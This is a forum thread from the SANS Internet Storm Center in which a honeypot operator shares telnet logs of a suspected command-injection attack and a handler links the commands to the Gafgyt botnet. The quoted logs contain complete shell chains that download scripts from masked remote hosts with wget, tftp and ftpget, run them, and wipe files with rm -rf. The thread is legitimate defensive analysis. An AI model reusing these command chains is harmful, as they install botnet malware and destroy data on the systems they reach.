Threat Level: green Handler on Duty: Brad Duncan

SANS ISC: New telnet attack? command injection against telnet... - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
New telnet attack? command injection against telnet...
Starting last night (Aug 23) I've seen a brand new style of attacks against my telnet honeypots. It appears that they are sending commands as the username and/or the password. I assume there's some new vulnerability where somebody's telnetd will actually run these commands.

Anybody have a clue?

Sample logs follow:

2016-08-23T22:22:43.301154-04:00 erhp2 ptelnetd[539]: IP: ###.#.137.70 TelnetLog: Username: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://##.###.2.94/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp ##.##.2.94 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g ##.###.2.94; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ##.###.2.94 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * Password: �

2016-08-24T02:32:58.166913-04:00 erhp2 ptelnetd[3966]: IP: ##.##.121.102 TelnetLog: Username: sh Password: cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://##.##.172.238/bin.sh;sh bin.sh;busybox tftp -r bin2.sh -g ##.##.172.238;sh bin2.sh;busybox tftp ##.##.172.238 -c get bin3.sh;sh bin3.sh;busybox ftpget ##.##.172.238 bin4.sh bin4.sh;sh bin4.sh;exit

>>Ericw
EricWedaa

4 Posts
Hello Eric,

Could be a buggy bot script?
The set of commands sent as username is coming from the classic Gafgyt malware…
Could you share the IP addresses with me please?

KR,
Xme

305 Posts
ISC Handler
I don't think so. That malware apparently tries a dictionary attack and if it suceeds THEN it sends commands. At least according to what little I could find. Do you have decent writeup someplace? EricWedaa

4 Posts

Sign Up for Free or Log In to start participating in the conversation!